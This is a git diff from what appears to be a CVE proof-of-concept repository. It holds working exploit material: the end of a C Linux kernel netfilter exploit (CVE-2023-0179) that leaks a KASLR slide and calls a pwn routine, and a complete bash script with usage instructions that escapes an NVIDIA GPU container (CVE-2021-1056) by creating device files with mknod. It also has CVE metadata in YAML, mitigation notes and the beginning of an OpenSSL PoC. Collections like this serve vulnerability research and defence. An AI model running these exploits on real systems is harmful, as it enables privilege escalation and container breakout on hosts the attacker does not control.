+ found_instr = read_from_file(1);
+ printf("[+] Found regs address: 0x%lx\n", found_addr);
+ printf("[+] Found instr address: 0x%lx\n", found_instr);
+ printf("[+] KASLR slide: 0x%lx\n", found_instr - INSTR_BASE);
+ system("nft delete table netdev mytable");
+ }
+
+ if (choice == LEAK_AND_PWN) {
+ printf("[+] Inserting the needle into address 0x%lx\n", found_addr);
+ sleep(5);
+ return pwn(nl, found_addr, found_instr);
+ }
+ return EXIT_SUCCESS;
+}
diff --git a/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml b/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml
index 74ca113bb0cb1849ee5b28fd2b0ce967274569d1..df17326309b74815316b67c4f10f3c78d40f25af 100644
--- a/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml
+++ b/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml
@@ -1,23 +1,23 @@
-id: CVE-2023-0179
-source: https://github.com/TurtleARM/CVE-2023-0179-PoC
-info:
- name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
- severity: high
- description: |
- 在 Linux 内核的 Netfilter 子系统中发现一个缓冲区溢出漏洞。此问题可能允许堆栈和堆地址泄漏,并可能允许通过任意代码执行将本地权限提升给根用户。
- scope-of-influence:
- Red Hat Enterprise Linux 9
- reference:
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0179
- - https://www.openwall.com/lists/oss-security/2023/01/13/2
- - https://patchwork.ozlabs.org/project/netfilter-devel/patch/20230111212251.193032-4-pablo@netfilter.org/
- - https://ubuntu.com/security/notices/USN-5856-1
- - https://ubuntu.com/security/notices/USN-5857-1
- - https://ubuntu.com/security/notices/USN-5858-1
- - https://ubuntu.com/security/notices/USN-5859-1
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 7.8
- cve-id: CVE-2023-0179
- cnvd-id: NONE
+id: CVE-2023-0179
+source: https://github.com/TurtleARM/CVE-2023-0179-PoC
+info:
+ name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+ severity: high
+ description: |
+ 在 Linux 内核的 Netfilter 子系统中发现一个缓冲区溢出漏洞。此问题可能允许堆栈和堆地址泄漏,并可能允许通过任意代码执行将本地权限提升给根用户。
+ scope-of-influence:
+ Red Hat Enterprise Linux 9
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0179
+ - https://www.openwall.com/lists/oss-security/2023/01/13/2
+ - https://patchwork.ozlabs.org/project/netfilter-devel/patch/20230111212251.193032-4-pablo@netfilter.org/
+ - https://ubuntu.com/security/notices/USN-5856-1
+ - https://ubuntu.com/security/notices/USN-5857-1
+ - https://ubuntu.com/security/notices/USN-5858-1
+ - https://ubuntu.com/security/notices/USN-5859-1
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2023-0179
+ cnvd-id: NONE
 tags: 缓冲区溢出,cve2023
\ No newline at end of file
diff --git a/cve/nvidia/2021/CVE-2021-1056/README.md b/cve/nvidia/2021/CVE-2021-1056/README.md
index ca9ccc4ace773c69ce7d0c86d0b046628c9fb30c..4e50d6c28c1a35c7700ffa08ee2b15d4024954dd 100644
--- a/cve/nvidia/2021/CVE-2021-1056/README.md
+++ b/cve/nvidia/2021/CVE-2021-1056/README.md
@@ -1,163 +1,163 @@ -# CVE-2021-1056 - -NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidia.ko) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure. - -Here demonstrates the vulnerability on GPU containers created by [nvidia-container-runtime](https://github.com/NVIDIA/nvidia-container-runtime). For a comprehensive understanding, check out the accompanying [official post](https://ubuntu.com/security/CVE-2021-1056) for in-depth details. - -## How it works - -By creating specific character device files an attacker in a GPU container(container created by `nvidia-container-runtime`) is able to get access to all GPU devices on the host. - -It also works on GPU pod created by `k8s-device-plugin` on kubernetes cluster. - - - -## Prerequisite - -* Docker 19.03 -* `nvidia-container-toolkit` - -* NVIDIA Driver 418.87.01 / 450.51.05 -* NVIDIA GPU Tesla V100 / TITAN V / Tesla K80 - -NOTE: refer to [NVIDIA Security Bulletin](https://nvidia.custhelp.com/app/answers/detail/a_id/5142), this vulnerability works on all GeForce, NVIDIA RTX/Quadro, NVS and Tesla series GPU, and all version drivers. - - - -## Usage - -* start a container with only 1 GPU card and mount - -```bash -$ docker run --gpus 1 -v $PWD:/CVE-2021-1056 -it tensorflow/tensorflow:1.13.2-gpu bash -``` - - - -* check gpu status **in container** - -```bash -# nvidia-smi -Sat Jan 9 07:21:03 2021 -+-----------------------------------------------------------------------------+ -| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 | -|-------------------------------+----------------------+----------------------+ -| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC | -| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. | -| | | MIG M. 
| -|===============================+======================+======================| -| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 | -| N/A 27C P0 23W / 250W | 0MiB / 32510MiB | 0% Default | -| | | N/A | -+-------------------------------+----------------------+----------------------+ - -+-----------------------------------------------------------------------------+ -| Processes: | -| GPU GI CI PID Type Process name GPU Memory | -| ID ID Usage | -|=============================================================================| -| No running processes found | -+-----------------------------------------------------------------------------+ -``` - - - -* execute script **in container** - -```bash -# bash /CVE-2021-1056/main.sh -[INFO] init GPU num: 1 -[DEBUG] /dev/nvidia0 exists, skip -[DEBUG] successfully get /dev/nvidia1 -[DEBUG] successfully get /dev/nvidia2 -[DEBUG] successfully get /dev/nvidia3 -[DEBUG] delete redundant /dev/nvidia4 -[INFO] get extra 3 GPU devices from host -[INFO] current GPU num: 4 -[INFO] exec nvidia-smi: -Sat Jan 9 07:22:43 2021 -+-----------------------------------------------------------------------------+ -| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 | -|-------------------------------+----------------------+----------------------+ -| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC | -| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. | -| | | MIG M. | -|===============================+======================+======================| -| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 | -| N/A 27C P0 23W / 250W | 0MiB / 32510MiB | 0% Default | -| | | N/A | -+-------------------------------+----------------------+----------------------+ -| 1 Tesla V100-PCIE... Off | 00000000:03:00.0 Off | 0 | -| N/A 30C P0 25W / 250W | 0MiB / 32510MiB | 0% Default | -| | | N/A | -+-------------------------------+----------------------+----------------------+ -| 2 Tesla V100-PCIE... 
Off | 00000000:82:00.0 Off | 0 | -| N/A 29C P0 25W / 250W | 0MiB / 32510MiB | 0% Default | -| | | N/A | -+-------------------------------+----------------------+----------------------+ -| 3 Tesla V100-PCIE... Off | 00000000:83:00.0 Off | 0 | -| N/A 28C P0 25W / 250W | 0MiB / 32510MiB | 0% Default | -| | | N/A | -+-------------------------------+----------------------+----------------------+ - -+-----------------------------------------------------------------------------+ -| Processes: | -| GPU GI CI PID Type Process name GPU Memory | -| ID ID Usage | -|=============================================================================| -| No running processes found | -+-----------------------------------------------------------------------------+ -``` - - - -* run a tensorflow demo **in container** to ensure all the GPUs can indeed be accessed - -```bash -# nohup python /CVE-2021-1056/tf_distr_demo.py > log 2>&1 & -# nvidia-smi -Sat Jan 9 18:58:23 2021 -+-----------------------------------------------------------------------------+ -| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 | -|-------------------------------+----------------------+----------------------+ -| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC | -| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. | -| | | MIG M. | -|===============================+======================+======================| -| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 | -| N/A 32C P0 36W / 250W | 31117MiB / 32510MiB | 1% Default | -| | | N/A | -+-------------------------------+----------------------+----------------------+ -| 1 Tesla V100-PCIE... Off | 00000000:03:00.0 Off | 0 | -| N/A 33C P0 35W / 250W | 31117MiB / 32510MiB | 1% Default | -| | | N/A | -+-------------------------------+----------------------+----------------------+ -| 2 Tesla V100-PCIE... 
Off | 00000000:82:00.0 Off | 0 | -| N/A 33C P0 36W / 250W | 31117MiB / 32510MiB | 1% Default | -| | | N/A | -+-------------------------------+----------------------+----------------------+ -| 3 Tesla V100-PCIE... Off | 00000000:83:00.0 Off | 0 | -| N/A 32C P0 37W / 250W | 31117MiB / 32510MiB | 1% Default | -| | | N/A | -+-------------------------------+----------------------+----------------------+ - -+-----------------------------------------------------------------------------+ -| Processes: | -| GPU GI CI PID Type Process name GPU Memory | -| ID ID Usage | -|=============================================================================| -+-----------------------------------------------------------------------------+ -``` - - - -## How to prevent - -Recommended - -* Refer to the [NVIDIA Security Bulletin](https://nvidia.custhelp.com/app/answers/detail/a_id/5142) or to update the NVIDIA GPU driver - -Or - -* Add arg `--cap-drop MKNOD` to the `docker run` to forbid the `mknod` in containers +# CVE-2021-1056 + +NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidia.ko) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure. + +Here demonstrates the vulnerability on GPU containers created by [nvidia-container-runtime](https://github.com/NVIDIA/nvidia-container-runtime). For a comprehensive understanding, check out the accompanying [official post](https://ubuntu.com/security/CVE-2021-1056) for in-depth details. + +## How it works + +By creating specific character device files an attacker in a GPU container(container created by `nvidia-container-runtime`) is able to get access to all GPU devices on the host. + +It also works on GPU pod created by `k8s-device-plugin` on kubernetes cluster. 
+ + + +## Prerequisite + +* Docker 19.03 +* `nvidia-container-toolkit` + +* NVIDIA Driver 418.87.01 / 450.51.05 +* NVIDIA GPU Tesla V100 / TITAN V / Tesla K80 + +NOTE: refer to [NVIDIA Security Bulletin](https://nvidia.custhelp.com/app/answers/detail/a_id/5142), this vulnerability works on all GeForce, NVIDIA RTX/Quadro, NVS and Tesla series GPU, and all version drivers. + + + +## Usage + +* start a container with only 1 GPU card and mount + +```bash +$ docker run --gpus 1 -v $PWD:/CVE-2021-1056 -it tensorflow/tensorflow:1.13.2-gpu bash +``` + + + +* check gpu status **in container** + +```bash +# nvidia-smi +Sat Jan 9 07:21:03 2021 ++-----------------------------------------------------------------------------+ +| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 | +|-------------------------------+----------------------+----------------------+ +| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC | +| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. | +| | | MIG M. | +|===============================+======================+======================| +| 0 Tesla V100-PCIE... 
Off | 00000000:02:00.0 Off | 0 | +| N/A 27C P0 23W / 250W | 0MiB / 32510MiB | 0% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ + ++-----------------------------------------------------------------------------+ +| Processes: | +| GPU GI CI PID Type Process name GPU Memory | +| ID ID Usage | +|=============================================================================| +| No running processes found | ++-----------------------------------------------------------------------------+ +``` + + + +* execute script **in container** + +```bash +# bash /CVE-2021-1056/main.sh +[INFO] init GPU num: 1 +[DEBUG] /dev/nvidia0 exists, skip +[DEBUG] successfully get /dev/nvidia1 +[DEBUG] successfully get /dev/nvidia2 +[DEBUG] successfully get /dev/nvidia3 +[DEBUG] delete redundant /dev/nvidia4 +[INFO] get extra 3 GPU devices from host +[INFO] current GPU num: 4 +[INFO] exec nvidia-smi: +Sat Jan 9 07:22:43 2021 ++-----------------------------------------------------------------------------+ +| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 | +|-------------------------------+----------------------+----------------------+ +| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC | +| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. | +| | | MIG M. | +|===============================+======================+======================| +| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 | +| N/A 27C P0 23W / 250W | 0MiB / 32510MiB | 0% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ +| 1 Tesla V100-PCIE... Off | 00000000:03:00.0 Off | 0 | +| N/A 30C P0 25W / 250W | 0MiB / 32510MiB | 0% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ +| 2 Tesla V100-PCIE... 
Off | 00000000:82:00.0 Off | 0 | +| N/A 29C P0 25W / 250W | 0MiB / 32510MiB | 0% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ +| 3 Tesla V100-PCIE... Off | 00000000:83:00.0 Off | 0 | +| N/A 28C P0 25W / 250W | 0MiB / 32510MiB | 0% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ + ++-----------------------------------------------------------------------------+ +| Processes: | +| GPU GI CI PID Type Process name GPU Memory | +| ID ID Usage | +|=============================================================================| +| No running processes found | ++-----------------------------------------------------------------------------+ +``` + + + +* run a tensorflow demo **in container** to ensure all the GPUs can indeed be accessed + +```bash +# nohup python /CVE-2021-1056/tf_distr_demo.py > log 2>&1 & +# nvidia-smi +Sat Jan 9 18:58:23 2021 ++-----------------------------------------------------------------------------+ +| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 | +|-------------------------------+----------------------+----------------------+ +| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC | +| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. | +| | | MIG M. | +|===============================+======================+======================| +| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 | +| N/A 32C P0 36W / 250W | 31117MiB / 32510MiB | 1% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ +| 1 Tesla V100-PCIE... Off | 00000000:03:00.0 Off | 0 | +| N/A 33C P0 35W / 250W | 31117MiB / 32510MiB | 1% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ +| 2 Tesla V100-PCIE... 
Off | 00000000:82:00.0 Off | 0 | +| N/A 33C P0 36W / 250W | 31117MiB / 32510MiB | 1% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ +| 3 Tesla V100-PCIE... Off | 00000000:83:00.0 Off | 0 | +| N/A 32C P0 37W / 250W | 31117MiB / 32510MiB | 1% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ + ++-----------------------------------------------------------------------------+ +| Processes: | +| GPU GI CI PID Type Process name GPU Memory | +| ID ID Usage | +|=============================================================================| ++-----------------------------------------------------------------------------+ +``` + + + +## How to prevent + +Recommended + +* Refer to the [NVIDIA Security Bulletin](https://nvidia.custhelp.com/app/answers/detail/a_id/5142) or to update the NVIDIA GPU driver + +Or + +* Add arg `--cap-drop MKNOD` to the `docker run` to forbid the `mknod` in containers * Enable `security context` in kubernetes clusters when creating a pod \ No newline at end of file diff --git a/cve/nvidia/2021/CVE-2021-1056/main.sh b/cve/nvidia/2021/CVE-2021-1056/main.sh index 504871b786f1761357a85a9338e821920234db08..24bb7a2462278a2e7342acda5b9bdf3f8c1eca7b 100644 --- a/cve/nvidia/2021/CVE-2021-1056/main.sh +++ b/cve/nvidia/2021/CVE-2021-1056/main.sh 
@@ -1,42 +1,42 @@ -#!/usr/bin/env bash - -ROOT=$(cd $(dirname ${BASH_SOURCE[0]}) && pwd -P) -source "${ROOT}/util.sh" - -INIT_GPU_NUM=$(util::get_gpu_num) -util::log_info "init GPU num: $INIT_GPU_NUM" - -# get major number and minor number from a legal GPU -DEV=/dev/$(ls /dev | grep nvidia[0-9] | head -n 1) -DEV_NUMBER=$(printf "%d %d" $(stat --format "0x%t 0x%T" $DEV)) - -GPU_NO=0 -while : -do - # skip this no if device file already exists - if [ -c "/dev/nvidia$GPU_NO" ]; then - util::log_debug "/dev/nvidia$GPU_NO exists, skip" - GPU_NO=`expr $GPU_NO + 1` - continue - fi - - CURRENT_GPU_NUM=$(util::get_gpu_num) - - # create specify device file to trick cgroup - mknod -m 666 /dev/nvidia$GPU_NO c $DEV_NUMBER - - # break if have got all GPUs on the host - if [ $(util::get_gpu_num) == "$CURRENT_GPU_NUM" ]; then - util::log_debug "delete redundant /dev/nvidia$GPU_NO" - rm /dev/nvidia$GPU_NO - break - fi - - util::log_debug "successfully get /dev/nvidia$GPU_NO" - GPU_NO=`expr $GPU_NO + 1` -done - -util::log_info "get extra $(expr $CURRENT_GPU_NUM - $INIT_GPU_NUM) GPU devices from host" -util::log_info "current GPU num: $CURRENT_GPU_NUM" -util::log_info "exec nvidia-smi:" +#!/usr/bin/env bash + +ROOT=$(cd $(dirname ${BASH_SOURCE[0]}) && pwd -P) +source "${ROOT}/util.sh" + +INIT_GPU_NUM=$(util::get_gpu_num) +util::log_info "init GPU num: $INIT_GPU_NUM" + +# get major number and minor number from a legal GPU +DEV=/dev/$(ls /dev | grep nvidia[0-9] | head -n 1) +DEV_NUMBER=$(printf "%d %d" $(stat --format "0x%t 0x%T" $DEV)) + +GPU_NO=0 +while : +do + # skip this no if device file already exists + if [ -c "/dev/nvidia$GPU_NO" ]; then + util::log_debug "/dev/nvidia$GPU_NO exists, skip" + GPU_NO=`expr $GPU_NO + 1` + continue + fi + + CURRENT_GPU_NUM=$(util::get_gpu_num) + + # create specify device file to trick cgroup + mknod -m 666 /dev/nvidia$GPU_NO c $DEV_NUMBER + + # break if have got all GPUs on the host + if [ $(util::get_gpu_num) == "$CURRENT_GPU_NUM" ]; then + 
util::log_debug "delete redundant /dev/nvidia$GPU_NO" + rm /dev/nvidia$GPU_NO + break + fi + + util::log_debug "successfully get /dev/nvidia$GPU_NO" + GPU_NO=`expr $GPU_NO + 1` +done + +util::log_info "get extra $(expr $CURRENT_GPU_NUM - $INIT_GPU_NUM) GPU devices from host" +util::log_info "current GPU num: $CURRENT_GPU_NUM" +util::log_info "exec nvidia-smi:" nvidia-smi \ No newline at end of file diff --git a/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py b/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py index e662da3464a603bf549d6001e568c9ab2c2c0483..040afbf5024691bdbb7fe3d39509dbc6ce5f8f48 100644 --- a/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py +++ b/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py 
@@ -1,106 +1,106 @@ -# coding=utf-8 -from tensorflow.examples.tutorials.mnist import input_data -from tensorflow.python.client import device_lib - -mnist = input_data.read_data_sets("/tmp/data/", one_hot=True) - -import tensorflow as tf - -learning_rate = 0.001 -training_steps = 8250 -batch_size = 100 -display_step = 100 - -n_hidden_1 = 256 -n_hidden_2 = 256 -n_input = 784 -n_classes = 10 - -def _variable_on_cpu(name, shape, initializer): - with tf.device('/cpu:0'): - dtype = tf.float32 - var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype) - return var - -def build_model(): - - def multilayer_perceptron(x, weights, biases): - layer_1 = tf.add(tf.matmul(x, weights['h1']), biases['b1']) - layer_1 = tf.nn.relu(layer_1) - - layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2']) - layer_2 = tf.nn.relu(layer_2) - - out_layer = tf.matmul(layer_2, weights['out']) + biases['out'] - return out_layer - - with tf.variable_scope('aaa'): - weights = { - 'h1': _variable_on_cpu('h1',[n_input, n_hidden_1],tf.random_normal_initializer()), - 'h2': _variable_on_cpu('h2',[n_hidden_1, n_hidden_2],tf.random_normal_initializer()), - 'out': _variable_on_cpu('out_w',[n_hidden_2, n_classes],tf.random_normal_initializer()) - } - biases = { - 'b1': _variable_on_cpu('b1',[n_hidden_1],tf.random_normal_initializer()), - 'b2': _variable_on_cpu('b2',[n_hidden_2],tf.random_normal_initializer()), - 'out': _variable_on_cpu('out_b',[n_classes],tf.random_normal_initializer()) - } - - pred = multilayer_perceptron(x, weights, biases) - - cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y)) - return cost,pred - - -def average_gradients(tower_grads): - average_grads = [] - for grad_and_vars in zip(*tower_grads): - grads = [] - for g,_ in grad_and_vars: - expanded_g = tf.expand_dims(g, 0) - grads.append(expanded_g) - grad = tf.concat(axis=0, values=grads) - grad = tf.reduce_mean(grad, 0) - v = grad_and_vars[0][1] - grad_and_var = (grad, v) - 
average_grads.append(grad_and_var) - return average_grads - - -with tf.Graph().as_default(), tf.device('/cpu:0'): - x = tf.placeholder("float", [None, n_input]) - y = tf.placeholder("float", [None, n_classes]) - tower_grads = [] - optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate) - local_device_protos = device_lib.list_local_devices() - num_gpus = sum([1 for d in local_device_protos if d.device_type == 'GPU']) - with tf.variable_scope(tf.get_variable_scope()): - for i in xrange(num_gpus): - with tf.device('/gpu:%d' % i): - cost,pred = build_model() - tf.get_variable_scope().reuse_variables() - grads = optimizer.compute_gradients(cost) - tower_grads.append(grads) - - grads = average_gradients(tower_grads) - apply_gradient_op = optimizer.apply_gradients(grads) - train_op = apply_gradient_op - - init = tf.global_variables_initializer() - sess = tf.Session() - sess.run(init) - - for step in range(training_steps): - image_batch, label_batch = mnist.train.next_batch(batch_size) - _, cost_print = sess.run([train_op, cost], - {x:image_batch, - y:label_batch}) - - if step % display_step == 0: - print("step=%04d" % (step+1)+ " cost=" + str(cost_print)) - print("Optimization Finished!") - correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1)) - accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float")) - with sess.as_default(): - print("Accuracy:", accuracy.eval({x: mnist.test.images, y: mnist.test.labels})) +# coding=utf-8 +from tensorflow.examples.tutorials.mnist import input_data +from tensorflow.python.client import device_lib + +mnist = input_data.read_data_sets("/tmp/data/", one_hot=True) + +import tensorflow as tf + +learning_rate = 0.001 +training_steps = 8250 +batch_size = 100 +display_step = 100 + +n_hidden_1 = 256 +n_hidden_2 = 256 +n_input = 784 +n_classes = 10 + +def _variable_on_cpu(name, shape, initializer): + with tf.device('/cpu:0'): + dtype = tf.float32 + var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype) 
+ return var + +def build_model(): + + def multilayer_perceptron(x, weights, biases): + layer_1 = tf.add(tf.matmul(x, weights['h1']), biases['b1']) + layer_1 = tf.nn.relu(layer_1) + + layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2']) + layer_2 = tf.nn.relu(layer_2) + + out_layer = tf.matmul(layer_2, weights['out']) + biases['out'] + return out_layer + + with tf.variable_scope('aaa'): + weights = { + 'h1': _variable_on_cpu('h1',[n_input, n_hidden_1],tf.random_normal_initializer()), + 'h2': _variable_on_cpu('h2',[n_hidden_1, n_hidden_2],tf.random_normal_initializer()), + 'out': _variable_on_cpu('out_w',[n_hidden_2, n_classes],tf.random_normal_initializer()) + } + biases = { + 'b1': _variable_on_cpu('b1',[n_hidden_1],tf.random_normal_initializer()), + 'b2': _variable_on_cpu('b2',[n_hidden_2],tf.random_normal_initializer()), + 'out': _variable_on_cpu('out_b',[n_classes],tf.random_normal_initializer()) + } + + pred = multilayer_perceptron(x, weights, biases) + + cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y)) + return cost,pred + + +def average_gradients(tower_grads): + average_grads = [] + for grad_and_vars in zip(*tower_grads): + grads = [] + for g,_ in grad_and_vars: + expanded_g = tf.expand_dims(g, 0) + grads.append(expanded_g) + grad = tf.concat(axis=0, values=grads) + grad = tf.reduce_mean(grad, 0) + v = grad_and_vars[0][1] + grad_and_var = (grad, v) + average_grads.append(grad_and_var) + return average_grads + + +with tf.Graph().as_default(), tf.device('/cpu:0'): + x = tf.placeholder("float", [None, n_input]) + y = tf.placeholder("float", [None, n_classes]) + tower_grads = [] + optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate) + local_device_protos = device_lib.list_local_devices() + num_gpus = sum([1 for d in local_device_protos if d.device_type == 'GPU']) + with tf.variable_scope(tf.get_variable_scope()): + for i in xrange(num_gpus): + with tf.device('/gpu:%d' % i): + cost,pred = build_model() 
+ tf.get_variable_scope().reuse_variables() + grads = optimizer.compute_gradients(cost) + tower_grads.append(grads) + + grads = average_gradients(tower_grads) + apply_gradient_op = optimizer.apply_gradients(grads) + train_op = apply_gradient_op + + init = tf.global_variables_initializer() + sess = tf.Session() + sess.run(init) + + for step in range(training_steps): + image_batch, label_batch = mnist.train.next_batch(batch_size) + _, cost_print = sess.run([train_op, cost], + {x:image_batch, + y:label_batch}) + + if step % display_step == 0: + print("step=%04d" % (step+1)+ " cost=" + str(cost_print)) + print("Optimization Finished!") + correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1)) + accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float")) + with sess.as_default(): + print("Accuracy:", accuracy.eval({x: mnist.test.images, y: mnist.test.labels})) sess.close() \ No newline at end of file diff --git a/cve/nvidia/2021/CVE-2021-1056/util.sh b/cve/nvidia/2021/CVE-2021-1056/util.sh index edadd3aa99b99d1033832f9b548ffb59c48e046a..495da6a55bc71167acffa236a66c24fc16e89ffd 100644 --- a/cve/nvidia/2021/CVE-2021-1056/util.sh +++ b/cve/nvidia/2021/CVE-2021-1056/util.sh @@ -1,13 +1,13 @@ -#!/usr/bin/env bash - -function util::get_gpu_num() { - echo "$(nvidia-smi -L | wc -l)" -} - -function util::log_info() { - echo "[INFO] $1" -} - -function util::log_debug() { - echo "[DEBUG] $1" +#!/usr/bin/env bash + +function util::get_gpu_num() { + echo "$(nvidia-smi -L | wc -l)" +} + +function util::log_info() { + echo "[INFO] $1" +} + +function util::log_debug() { + echo "[DEBUG] $1" } \ No newline at end of file diff --git a/cve/nvidia/2021/yaml/CVE-2021-1056.yaml b/cve/nvidia/2021/yaml/CVE-2021-1056.yaml index 40d10b98d652d130214bbe641a4d6e75320bad06..2e7920f24d8cc85bc7425adb2380c2526d342d0b 100644 --- a/cve/nvidia/2021/yaml/CVE-2021-1056.yaml +++ b/cve/nvidia/2021/yaml/CVE-2021-1056.yaml 
@@ -1,23 +1,23 @@
-id: CVE-2021-1056
-source: https://github.com/pokerfaceSad/CVE-2021-1056
-info:
- name: NVIDIA提供了针对Linux系统的官方显卡驱动程序,这些驱动程序包括内核模块、用户空间库和命令行工具,可以与Linux操作系统集成,提供高性能的图形加速和计算能力。
- severity: High
- description: |
- 漏洞CVE-2021-1056是NVIDIA GPU驱动程序与设备隔离相关的安全漏洞。当容器以非特权模式启动,攻击者利用这个漏洞,在容器中创建特殊的字符设备文件后,能够获取宿主机上所有GPU设备的访问权限。
- 适用于Linux的 NVIDIA GPU显示驱动程序,所有版本,都包含内核模式层 (nvidia.ko) 中的一个漏洞,在该漏洞中它不完全遵守操作系统文件系统权限以提供 GPU 设备级隔离,这可能会导致拒绝服务 或信息披露。
- scope-of-influence:
- nvidia:gpu_driver:390≤390.141, nvidia:gpu_driver:450≤450.102.04, nvidia:gpu_driver:460≤460.32.03.
- reference:
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1056
- - https://nvidia.custhelp.com/app/answers/detail/a_id/5142
- - https://ubuntu.com/security/notices/USN-4689-1
- - https://ubuntu.com/security/notices/USN-4689-2
- - https://ubuntu.com/security/CVE-2021-1056
- - https://www.cvedetails.com/cve/CVE-2021-1056/?q=CVE-2021-1056
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
- cvss-score: 7.1
- cve-id: CVE-2021-1056
- cwe-id: CWE-276
+id: CVE-2021-1056
+source: https://github.com/pokerfaceSad/CVE-2021-1056
+info:
+ name: NVIDIA提供了针对Linux系统的官方显卡驱动程序,这些驱动程序包括内核模块、用户空间库和命令行工具,可以与Linux操作系统集成,提供高性能的图形加速和计算能力。
+ severity: High
+ description: |
+ 漏洞CVE-2021-1056是NVIDIA GPU驱动程序与设备隔离相关的安全漏洞。当容器以非特权模式启动,攻击者利用这个漏洞,在容器中创建特殊的字符设备文件后,能够获取宿主机上所有GPU设备的访问权限。
+ 适用于Linux的 NVIDIA GPU显示驱动程序,所有版本,都包含内核模式层 (nvidia.ko) 中的一个漏洞,在该漏洞中它不完全遵守操作系统文件系统权限以提供 GPU 设备级隔离,这可能会导致拒绝服务 或信息披露。
+ scope-of-influence:
+ nvidia:gpu_driver:390≤390.141, nvidia:gpu_driver:450≤450.102.04, nvidia:gpu_driver:460≤460.32.03.
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1056
+ - https://nvidia.custhelp.com/app/answers/detail/a_id/5142
+ - https://ubuntu.com/security/notices/USN-4689-1
+ - https://ubuntu.com/security/notices/USN-4689-2
+ - https://ubuntu.com/security/CVE-2021-1056
+ - https://www.cvedetails.com/cve/CVE-2021-1056/?q=CVE-2021-1056
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
+ cvss-score: 7.1
+ cve-id: CVE-2021-1056
+ cwe-id: CWE-276
 tags: 权限提升, 拒绝服务, 信息泄漏, cve2021
\ No newline at end of file
diff --git a/cve/openssl/2022/CVE-2022-0778/bad_BN.c b/cve/openssl/2022/CVE-2022-0778/bad_BN.c
index 34247ac8cd5324e2a1c58716edef597ea22d521e..6fbf819b3429b2681b3cd4e0cec5a645c0742d14 100644
--- a/cve/openssl/2022/CVE-2022-0778/bad_BN.c
+++ b/cve/openssl/2022/CVE-2022-0778/bad_BN.c
@@ -1,22 +1,22 @@
-#include
-
-
-int main() {
- BN_CTX *ctx;
